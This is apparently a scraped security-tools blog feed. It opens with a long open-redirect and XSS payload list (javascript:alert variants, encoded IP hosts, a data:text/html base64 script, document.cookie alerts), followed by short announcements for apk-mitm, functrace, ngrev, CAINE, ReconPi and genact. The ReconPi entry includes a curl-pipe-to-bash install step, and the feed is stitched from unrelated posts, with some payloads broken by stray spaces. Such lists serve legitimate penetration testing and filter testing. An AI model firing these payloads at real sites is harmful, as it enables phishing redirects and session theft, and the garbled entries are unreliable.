https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
/https://localdomain.pw /%2f%2e%2e
/https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
//localdomain.pw/
//www.whitelisteddomain.tld@localdomain.pw/
///localdomain.pw/
///www.whitelisteddomain.tld@localdomain.pw/
////localdomain.pw/
////www.whitelisteddomain.tld@localdomain.pw/
https://localdomain.pw/
https://www.whitelisteddomain.tld@localdomain.pw/
/https://localdomain.pw/
/https://www.whitelisteddomain.tld@localdomain.pw/
//localdomain.pw//
//www.whitelisteddomain.tld@localdomain.pw//
///localdomain.pw//
///www.whitelisteddomain.tld@localdomain.pw//
////localdomain.pw//
////www.whitelisteddomain.tld@localdomain.pw//
https://localdomain.pw//
https://www.whitelisteddomain.tld@localdomain.pw//
//https://localdomain.pw//
//https://www.whitelisteddomain.tld@localdomain.pw//
//localdomain.pw/%2e%2e%2f
//www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
///localdomain.pw/%2e%2e%2f
///www.whitelisteddoma in.tld@localdomain.pw/%2e%2e%2f
////localdomain.pw/%2e%2e%2f
////www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
https://localdomain.pw/%2e%2e%2f
https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
//https://localdomain.pw/%2e%2e%2f
//https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
///localdomain.pw/%2e%2e
///www.whitelisteddomain.tld@localdomain.pw/%2e%2e
////localdomain.pw/%2e%2e
////www.whitelisteddomain.tld@localdomain.pw/%2e%2e
https:///localdomain.pw/%2e%2e
https:///www.whitelisteddomain.tld@localdomain.pw/%2e%2e
//https:///localdomain.pw/%2e%2e
//www.whitelisteddomain.tld@https:///localdomain.pw/%2e%2e
/https://localdomain.pw/%2e%2e
/https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e
///localdomain.pw/%2f%2e%2e
///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
////localdomain.pw/%2f%2e%2e
////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
https:///localdomain. pw/%2f%2e%2e
https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
/https://localdomain.pw/%2f%2e%2e
/https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
/https:///localdomain.pw/%2f%2e%2e
/https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
/%09/localdomain.pw
/%09/www.whitelisteddomain.tld@localdomain.pw
//%09/localdomain.pw
//%09/www.whitelisteddomain.tld@localdomain.pw
///%09/localdomain.pw
///%09/www.whitelisteddomain.tld@localdomain.pw
////%09/localdomain.pw
////%09/www.whitelisteddomain.tld@localdomain.pw
https://%09/localdomain.pw
https://%09/www.whitelisteddomain.tld@localdomain.pw
/%5clocaldomain.pw
/%5cwww.whitelisteddomain.tld@localdomain.pw
//%5clocaldomain.pw
//%5cwww.whitelisteddomain.tld@localdomain.pw
///%5clocaldomain.pw
///%5cwww.whitelisteddomain.tld@localdomain.pw
////%5clocaldomain.pw
////%5cwww.whitelisteddomain.tld@localdomain.pw
https://%5cloc aldomain.pw
https://%5cwww.whitelisteddomain.tld@localdomain.pw
/https://%5clocaldomain.pw
/https://%5cwww.whitelisteddomain.tld@localdomain.pw
https://localdomain.pw
https://www.whitelisteddomain.tld@localdomain.pw
javascript:alert(1);
javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
//localdomain.pw
https:localdomain.pw
//localdomain%E3%80%82pw
\/\/localdomain.pw/
/\/localdomain.pw/
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
//localdomain.pw
https://www.whitelisteddomain.tld/https://localdomain.pw/
";alert(0);//
javascript://www.whitelisteddomain.tld?%a0alert%281%29
http://0xd8.0x3a.0xd6.0xce
http://www.whitelisteddomain.tl d@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://0xd83ad6ce
http://www.whitelisteddomain.tld@0xd83ad6ce
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://XY>.7d8T\205pZM@0xd83ad6ce
http://3627734734
http://www.whitelisteddomain.tld@3627734734
http://3H6k7lIAiqjfNeN@3627734734
http://XY>.7d8T\205pZM@3627734734
http://472.314.470.462
http://www.whitelisteddomain.tld@472.314.470.462
http://3H6k7lIAiqjfNeN@472.314.470.462
http://XY>.7d8T\205pZM@472.314.470.462
http://0330.072.0326.0316
http://www.whitelisteddomain.tld@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http://XY>.7d8T\205pZM@0330.072.0326.0316
http://00330.00072.0000326.00000316
http://www.whitelisteddomain.tld@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http: //[::216.58.214.206]
http://www.whitelisteddomain.tld@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http://XY>.7d8T\205pZM@[::216.58.214.206]
http://[::ffff:216.58.214.206]
http://www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://0xd8.072.54990
http://www.whitelisteddomain.tld@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.072.54990
http://0xd8.3856078
http://www.whitelisteddomain.tld@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd8.3856078
http://XY>.7d8T\205pZM@0xd8.3856078
http://00330.3856078
http://www.whitelisteddomain.tld@00330.3856078
http://3H6k7lIAiqjfNeN@00330.3856078
http://XY>.7d8T\205pZM@00330.3856078
http://00330.0x3a.54990
http://www.whitelisteddomain.tld@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http://XY&g t;.7d8T\205pZM@00330.0x3a.54990
http:0xd8.0x3a.0xd6.0xce
http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:0xd83ad6ce
http:www.whitelisteddomain.tld@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http:3627734734
http:www.whitelisteddomain.tld@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http:XY>.7d8T\205pZM@3627734734
http:472.314.470.462
http:www.whitelisteddomain.tld@472.314.470.462
http:3H6k7lIAiqjfNeN@472.314.470.462
http:XY>.7d8T\205pZM@472.314.470.462
http:0330.072.0326.0316
http:www.whitelisteddomain.tld@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http:XY>.7d8T\205pZM@0330.072.0326.0316
http:00330.00072.0000326.00000316
http:www.whitelisteddomain.tld@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:XY>. 7d8T\205pZM@00330.00072.0000326.00000316
http:[::216.58.214.206]
http:www.whitelisteddomain.tld@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::216.58.214.206]
http:[::ffff:216.58.214.206]
http:www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:0xd8.072.54990
http:www.whitelisteddomain.tld@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.072.54990
http:0xd8.3856078
http:www.whitelisteddomain.tld@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd8.3856078
http:XY>.7d8T\205pZM@0xd8.3856078
http:00330.3856078
http:www.whitelisteddomain.tld@00330.3856078
http:3H6k7lIAiqjfNeN@00330.3856078
http:XY>.7d8T\205pZM@00330.3856078
http:00330.0x3a.54990
http:www.whitelisteddomain.tld@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http:XY >.7d8T\205pZM@00330.0x3a.54990
〱localdomain.pw
〵localdomain.pw
ゝlocaldomain.pw
ーlocaldomain.pw
ーlocaldomain.pw
/〱localdomain.pw
/〵localdomain.pw
/ゝlocaldomain.pw
/ーlocaldomain.pw
/ーlocaldomain.pw
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
<>javascript:alert(1);
<>//localdomain.pw
//localdomain.pw\@www.whitelisteddomain.tld
https://:@localdomain.pw\@www.whitelisteddomain.tld
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
ja\nva\tscript\r:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
http://localdomain.pw:80#@www.whitelisteddomain.tld/
http://localdomain.pw:80?@www.whitelisteddomain.tld/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.t ld+@localdomain.pw/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/
http://www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/
http://localdomain.pw\twww.whitelisteddomain.tld/
//localdomain.pw:80#@www.whitelisteddomain.tld/
//localdomain.pw:80?@www.whitelisteddomain.tld/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/
//www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/
//localdomain.pw\twww.whitelisteddomain.tld/
//;@localdomain.pw
http://;@localdomain.pw
@localdomain.pw
javascript://https://www.whitelisteddomain.tld/? z=%0Aalert(1)
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
http://localdomain.pw%2f%2f.www.whitelisteddomain.tld/
http://localdomain.pw%5c%5c.www.whitelisteddomain.tld/
http://localdomain.pw%3F.www.whitelisteddomain.tld/
http://localdomain.pw%23.www.whitelisteddomain.tld/
http://www.whitelisteddomain.tld:80%40localdomain.pw/
http://www.whitelisteddomain.tld%2elocaldomain.pw/
/x:1/:///%01javascript:alert(document.cookie)/
/https:/%5clocaldomain.pw/
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
/http://localdomain.pw
/%2f%2flocaldomain.pw
/localdomain.pw/%2f%2e%2e
/http:/localdomain.pw
/.localdomain.pw
http://.localdomain.pw
.localdomain.pw
///\;@localdomain.pw
///localdomain.pw
/////localdomain.pw/
/////localdomain.pw
java%0ascript:alert(1)
java%09script:alert(1)
java%0dscript:alert(1)
javascript://%0aalert(1)
Javas%26%2399;ript:alert(1)
data: www.whitelisteddomain.tld;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
jaVAscript://www.whitelisteddomain.tld//%0d%0aalert(1);//
http://www.localdomain.pw\.www.whitelisteddomain.tld
%19Jav%09asc%09ript:https%20://www.whitelisteddomain.tld/%250Aconfirm%25281%2529
//example.com@google.com/%2f..
///google.com/%2f..
///example.com@google.com/%2f..
////google.com/%2f..
////example.com@google.com/%2f..
https://google.com/%2f..
https://example.com@google.com/%2f..
/https://google.com/%2f..
/https://example.com@google.com/%2f..
//google.com/%2f%2e%2e
//example.com@google.com/%2f%2e%2e
///google.com/%2f%2e%2e
///example.com@google.com/%2f%2e%2e
////google.com/%2f%2e%2e
////example.com@google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
https://example.com@google.com/%2f%2e%2e
/https://google.com/%2f%2e%2 e
/https://example.com@google.com/%2f%2e%2e
//google.com/
//example.com@google.com/
///google.com/
///example.com@google.com/
////google.com/
////example.com@google.com/
https://google.com/
https://example.com@google.com/
/https://google.com/
/https://example.com@google.com/
//google.com//
//example.com@google.com//
///google.com//
///example.com@google.com//
////google.com//
////example.com@google.com//
https://google.com//
https://example.com@google.com//
//https://google.com//
//https://example.com@google.com//
//google.com/%2e%2e%2f
//example.com@google.com/%2e%2e%2f
///google.com/%2e%2e%2f
///example.com@google.com/%2e%2e%2f
////google.com/%2e%2e%2f
////example.com@google.com/%2e%2e%2f
https://google.com/%2e%2e%2f
https://example.com@google.com/%2e%2e%2f
//https://google.com/%2e%2e%2f
//https://example.com@google.com/%2e%2e%2f
///google.com/%2e%2e
///example.com@google.com/%2e%2e
////google.com/%2e%2e
////example.com@google.com/%2e%2e
https:///google.com/%2e%2e
https:///example.com@google.com/%2e%2e
//https:///google.com/%2e%2e
//example.com@https:///google.com/%2e%2e
/https://google.com/%2e%2e
/https://example.com@google.com/%2e%2e
///google.com/%2f%2e%2e
///example.com@google.com/%2f%2e%2e
////google.com/%2f%2e%2e
////example.com@google.com/%2f%2e%2e
https:///google.com/%2f%2e%2e
https:///example.com@google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
/https://example.com@google.com/%2f%2e%2e
/https:///google.com/%2f%2e%2e
/https:///example.com@google.com/%2f%2e%2e
/%09/google.com
/%09/example.com@google.com
//%09/google.com
//%09/example.com@google.com
///%09/google.com
///%09/example.com@google.com
////%09/google.com
////%09/example.com@google.com
https://%09/google.com
https://%09/example.com@google.com
/%5c google.com
/%5cexample.com@google.com
//%5cgoogle.com
//%5cexample.com@google.com
///%5cgoogle.com
///%5cexample.com@google.com
////%5cgoogle.com
////%5cexample.com@google.com
https://%5cgoogle.com
https://%5cexample.com@google.com
/https://%5cgoogle.com
/https://%5cexample.com@google.com
https://google.com
https://example.com@google.com
javascript:alert(1);
javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
//google.com
https:google.com
//google%E3%80%82com
\/\/google.com/
/\/google.com/
//google.com
https://example.com/https://google.com/
";alert(0);//
javascript://example.com?%a0alert%281%29
http://0 xd8.0x3a.0xd6.0xce
http://example.com@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://0xd83ad6ce
http://example.com@0xd83ad6ce
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://XY>.7d8T\205pZM@0xd83ad6ce
http://3627734734
http://example.com@3627734734
http://3H6k7lIAiqjfNeN@3627734734
http://XY>.7d8T\205pZM@3627734734
http://472.314.470.462
http://example.com@472.314.470.462
http://3H6k7lIAiqjfNeN@472.314.470.462
http://XY>.7d8T\205pZM@472.314.470.462
http://0330.072.0326.0316
http://example.com@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http://XY>.7d8T\205pZM@0330.072.0326.0316
http://00330.00072.0000326.00000316
http://example.com@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://[::216.58.214.206]
http: //example.com@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http://XY>.7d8T\205pZM@[::216.58.214.206]
http://[::ffff:216.58.214.206]
http://example.com@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://0xd8.072.54990
http://example.com@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.072.54990
http://0xd8.3856078
http://example.com@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd8.3856078
http://XY>.7d8T\205pZM@0xd8.3856078
http://00330.3856078
http://example.com@00330.3856078
http://3H6k7lIAiqjfNeN@00330.3856078
http://XY>.7d8T\205pZM@00330.3856078
http://00330.0x3a.54990
http://example.com@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.0x3a.54990
http:0xd8.0x3a.0xd6.0xce
http:example.com@0xd8.0x3a.0xd6.0xce
http:3H6 k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:0xd83ad6ce
http:example.com@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http:3627734734
http:example.com@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http:XY>.7d8T\205pZM@3627734734
http:472.314.470.462
http:example.com@472.314.470.462
http:3H6k7lIAiqjfNeN@472.314.470.462
http:XY>.7d8T\205pZM@472.314.470.462
http:0330.072.0326.0316
http:example.com@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http:XY>.7d8T\205pZM@0330.072.0326.0316
http:00330.00072.0000326.00000316
http:example.com@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:[::216.58.214.206]
http:example.com@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::216.58.214.206 ]
http:[::ffff:216.58.214.206]
http:example.com@[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:0xd8.072.54990
http:example.com@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.072.54990
http:0xd8.3856078
http:example.com@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd8.3856078
http:XY>.7d8T\205pZM@0xd8.3856078
http:00330.3856078
http:example.com@00330.3856078
http:3H6k7lIAiqjfNeN@00330.3856078
http:XY>.7d8T\205pZM@00330.3856078
http:00330.0x3a.54990
http:example.com@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.0x3a.54990
〱google.com
〵google.com
ゝgoogle.com
ーgoogle.com
ーgoogle.com
/〱google.com
/〵google.com
/ゝgoogle.com
/ーgoogle.com
/ーgoogle.com
%68%74%74 %70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
<>javascript:alert(1);
<>//google.com
//google.com\@example.com
https://:@google.com\@example.com
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
ja\nva\tscript\r:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
http://google.com:80#@example.com/
http://google.com:80?@example.com/
http://3H6k7lIAiqjfNeN@example.com+@google.com/
http://XY>.7d8T\205pZM@example.com+@google.com/
http://3H6k7lIAiqjfNeN@example.com@google.com/
http://XY>.7d8T\205pZM@example.com@google.com/
http://example.com+&@google.com#+@example.com/
http://google.com\texample.com/
//google.com:80#@example.com/
//google.com:80?@example.com/
//3H6k7lIAiqjfNeN@example.com+@google.com/
//XY>.7d8T\205pZM@examp le.com+@google.com/
//3H6k7lIAiqjfNeN@example.com@google.com/
//XY>.7d8T\205pZM@example.com@google.com/
//example.com+&@google.com#+@example.com/
//google.com\texample.com/
//;@google.com
http://;@google.com
@google.com
javascript://https://example.com/?z=%0Aalert(1)
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
http://google.com%2f%2f.example.com/
http://google.com%5c%5c.example.com/
http://google.com%3F.example.com/
http://google.com%23.example.com/
http://example.com:80%40google.com/
http://example.com%2egoogle.com/
/x:1/:///%01javascript:alert(document.cookie)/
/https:/%5cgoogle.com/
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
/http://google.com
/%2f%2fgoogle.com
/google.com/%2f%2e%2e
/http:/google.com
/.google.com
///\;@google.com
///google.com
/////google.com/

References :


Apk-Mitm - A CLI Application That Prepares Android APK Files For HTTPS Inspection

$
0
0

A CLI application that automatically prepares Android APK files for HTTPS inspection

Inspecting a mobile app's HTTPS traffic using a proxy is probably the easiest way to figure out how it works. However, with the Network Security Configuration introduced in Android 7 and app developers trying to prevent MITM attacks using certificate pinning, getting an app to work with an HTTPS proxy has become quite tedious.
apk-mitm automates the entire process. All you have to do is give it an APK file and apk-mitm will:
You can also use apk-mitm to patch apps using Android App Bundle and rooting your phone is not required.

Usage
If you have an up-to-date version of Node.js (8.2+) and Java (8+), you can run this command to patch an app:
$ npx apk-mitm <path-to-apk>
So, if your APK file is called example.apk, you'd run:
$ npx apk-mitm example.apk

✔ Decoding APK file
✔ Modifying app manifest
✔ Modifying network security config
✔ Disabling certificate pinning
✔ Encoding patched APK file
✔ Signing patched APK file

Done! Patched APK: ./example-patched.apk
You can now install the example-patched.apk file on your Android device and use a proxy like Charles or mitmproxy to look at the app's traffic.

Patching App Bundles
You can also patch apps using Android App Bundle with apk-mitm by providing it with a *.xapk file (for example from APKPure) or a *.apks file (which you can export yourself using SAI).

Caveats
  • If the app uses Google Maps and the map is broken after patching, then the app's API key is probably restricted to the developer's certificate. You'll have to create your own API key without restrictions and replace it in the app's AndroidManifest.xml file.
  • If apk-mitm crashes while decoding or encoding the issue is probably related to Apktool. Check their issues on GitHub to find possible workarounds. If you happen to find an Apktool version that's not affected by the issue, you can instruct apk-mitm to use it by specifying the path of its JAR file through the --apktool option.

Installation
The above example used npx to download and execute apk-mitm without local installation. If you do want to fully install it, you can do that by running:
$ npm install -g apk-mitm

Thanks


Functrace - A Function Tracer

$
0
0

functrace is a tool that helps to analyze a binary file with dynamic instrumentation using DynamoRIO (http://dynamorio.org/).
These are some implemented features (based on DynamoRIO):
  • disassemble all the executed code
  • disassemble a specific function (dump if these are addresses)
  • get arguments of a specific function (dump if these are addresses)
  • get return value of a specific function (dump if this is an address)
  • monitors application signals
  • generate a report file
  • ghidra(https://ghidra-sre.org/) coverage script (based on the functrace report file)

Setup
$ wget https://github.com/DynamoRIO/dynamorio/releases/download/release_7_0_0_rc1/DynamoRIO-Linux-7.0.0-RC1.tar.gz
$ tar xvzf DynamoRIO-Linux-7.0.0-RC1.tar.gz
OR
$ wget https://github.com/DynamoRIO/dynamorio/releases/download/cronbuild-7.91.18047/DynamoRIO-x86_64-Linux-7.91.18047-0.tar.gz
$ tar xvzf DynamoRIO-x86_64-Linux-7.91.18047-0.tar.gz
You can also clone and compile directly DynamoRIO
$ git clone https://github.com/invictus1306/functrace
$ mkdir -p functrace/build
$ cd functrace/build
$ cmake .. -DDynamoRIO_DIR=/full_DR_path/cmake/
$ make -j4

Using functrace
$ drrun -c libfunctrace.so -report_file report -- target_program [args]

Options
The following [functrace](https://github.com/invictus1306/functrace) options are supported:
-disassembly                    -> disassemble all the functions 
-disas_func function_name -> disassemble only the function function_name
-wrap_function function_name -> wrap the function function_name
-wrap_function_args num_args -> number of arguments of the wrapped function
-cbr -> remove the bb from the cache (in case of conditional jump)
-report_file file_name -> report file name (required)
-verbose -> verbose

Simple usage

Option -verbose
$ drrun -c libfunctrace.so -report_file report -verbose -- target_program [args]

Option -disassemby
$ drrun -c libfunctrace.so -report_file report -disassembly -- target_program [args]

Option -disas_func
$ drrun -c libfunctrace.so -report_file report -disas_func name_function -- target_program [args]

Option -wrap_function and -wrap_function_args
$ drrun -c libfunctrace.so -report_file report -wrap_function name_function -wrap_function_args num_args -- target_program [args]

Option -cbr
$ drrun -c libfunctrace.so -report_file report -cbr -- target_program [args]

CVE-2018-4013 - Vulnerability Analysis
A vulnerability on the LIVE555 RTSP server library. This is the description.


Working enviroment
Tested on Ubuntu 16.04.5 LTS 64 bit

Future features
  • Ghidra plugin
  • Visual setup interface
  • Store and compare different coverage analysis
  • Run DR directy from ghidra
  • Add more functionality to functrace
  • Support for Android


Ngrev - Tool For Reverse Engineering Of Angular Applications

$
0
0

Graphical tool for reverse engineering of Angular projects. It allows you to navigate in the structure of your application and observe the relationship between the different modules, providers, and directives. The tool performs static code analysis which means that you don't have to run your application in order to use it.

How to use?

macOS
  1. Go to the releases page.
  2. Download the latest *.dmg file.
  3. Install the application.

Linux
  1. Go to the releases page.
  2. Download the latest *.AppImage file.
  3. Run the *.AppImage file (you may need to chmod +x *.AppImage).

Windows
  1. Go to the releases page.
  2. Download the latest *.exe file.
  3. Install the application.

Creating a custom theme
You can add your own theme by creating a [theme-name].theme.json file in Electron[userData]/themes. For a sample theme see Dark.

Application Requirements
Your application needs to be compatible with the Angular's AoT compiler (i.e. you should be able to compile it with ngc).

Using with Angular CLI
  1. Open the Angular's application directory.
  2. Make sure the dependencies are installed.
  3. Open ngrev.
  4. Click on Select Project and select [YOUR_CLI_APP]/src/tsconfig.app.json.

Using with Angular Seed
  1. Open the Angular's application directory.
  2. Make sure the dependencies are installed.
  3. Open ngrev.
  4. Click on Select Project and select [YOUR_CLI_APP]/src/client/tsconfig.json.

Demo
Demo here.






CAINE 11 - GNU/Linux Live Distribution For Digital Forensics Project, Windows Side Forensics And Incident Response

$
0
0

CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a Digital Forensics project. Currently, the project manager is Nanni Bassetti (Bari - Italy).
CAINE offers a complete forensic environment that is organized to integrate existing software tools as software modules and to provide a friendly graphical interface.

The main design objectives that CAINE aims to guarantee are the following:
  • an interoperable environment that supports the digital investigator during the four phases of the digital investigation
  • a user-friendly graphical interface
  • user-friendly tools
CAINE represents fully the spirit of the Open Source philosophy because the project is completely open, everyone could take on the legacy of the previous developer or project manager. The distro is open source, the Windows side is freeware and, the last but not least, the distro is installable, thus giving the opportunity to rebuild it in a new brand version, so giving a long life to this project...


The important news is CAINE 11.0 blocks all the block devices (e.g. /dev/sda), in Read-Only mode. You can use a tool with a GUI named BlockON/OFF present on CAINE's Desktop.
This new write-blocking method assures all disks are really preserved from accidentally writing operations, because they are locked in Read-Only mode.
If you need to write a disk, you can unlock it with BlockOn/Off or using "Mounter" changing the policy in writable mode.
CAINE is always more fast during the boot.
CAINE 11.0 can boot to RAM (toram).

IMPORTANT CHANGES:
  • All devices are blocked in Read-Only mode, by default.
  • New tools, new OSINT, Autopsy 4.13 onboard, APFS ready,BTRFS forensic tool, NVME SSD drivers ready!
  • SSH server disabled by default (see Manual page for enabling it).
  • SCRCPY - screen your android device
  • Autopsy 4.13 + additional plugins by McKinnon.
  • X11VNC Server - to control CAINE remotely.
  • hashcat
  • NEW SCRIPTS (Forensics Tools - Analysis menu)
  • AutoMacTc - a forensics tool for Mac.
  • Bitlocker - volatility plugin
  • Autotimeliner - Automagically extract forensic timeline from volatile memory dumps.
  • Firmwalker - firmware analyzer.
  • CDQR - Cold Disk Quick Response tool
  • many others fixing and software updating.


ReconPi - Set Up Your Raspberry Pi To Perform Basic Recon Scans

$
0
0

ReconPi - A lightweight recon tool that performs extensive reconnaissance with the latest tools using a Raspberry Pi.
Start using that Raspberry Pi -- I know you all have one laying around somewhere ;)

Installation
Check the updated blogpost here for a complete guide on how to set up your own ReconPi: ReconPi Guide
If you prepared your Raspberry Pi through the guide linked above you should be able to continue below.
ReconPi v2.0 needs the HypriotOS (V1.10.0) image to work 100%!

Easy installation
Connect to your ReconPi with SSH:
ssh pirate@192.168.2.16 [Change IP to ReconPi IP]
Curl the install.sh script and run it:
curl -L https://raw.githubusercontent.com/x1mdev/ReconPi/master/install.sh | bash

Manual installation
Connect to your ReconPi with SSH:
$ ssh pirate@192.168.2.16 [Change IP to ReconPi IP]
Now we can set up everything, it's quite simple:
  • git clone https://github.com/x1mdev/ReconPi.git
  • cd ReconPi
  • ./install.sh
  • The script gives a reboot command at the end of install.sh, please login again to start using the ReconPi.
Grab a cup of coffee since this will take a while.

Usage
After installing all of the dependencies for the ReconPi you can finally start doing some recon!
$ recon <domain.tld>
recon.sh will first gather resolvers for the given target, followed by subdomain enumeration and checking those assets for potential subdomain takeover. When this is done the IP addresses of the target are enumerated. Open ports will be discovered accompanied by a service scan provided by Nmap.
Finally the live targets will be screenshotted and evaluated to discover endpoints.
Results will be stored on the Recon Pi and can be viewed by running `python -m SimpleHTTPServer 1337" in your results directory. Your results will be accessible from any system with a browser that exists in the same network.

Tools
Tools that are being used at this moment:
More tools will be added in the future, feel free to make a pull request!

Contributors



Genact - A Nonsense Activity Generator

$
0
0

Pretend to be busy or waiting for your computer when you should actually be doing real work! Impress people with your insane multitasking skills. Just open a few instances of genact and watch the show. genact has multiple scenes that pretend to be doing something exciting or useful when in reality nothing is happening at all.



Installation
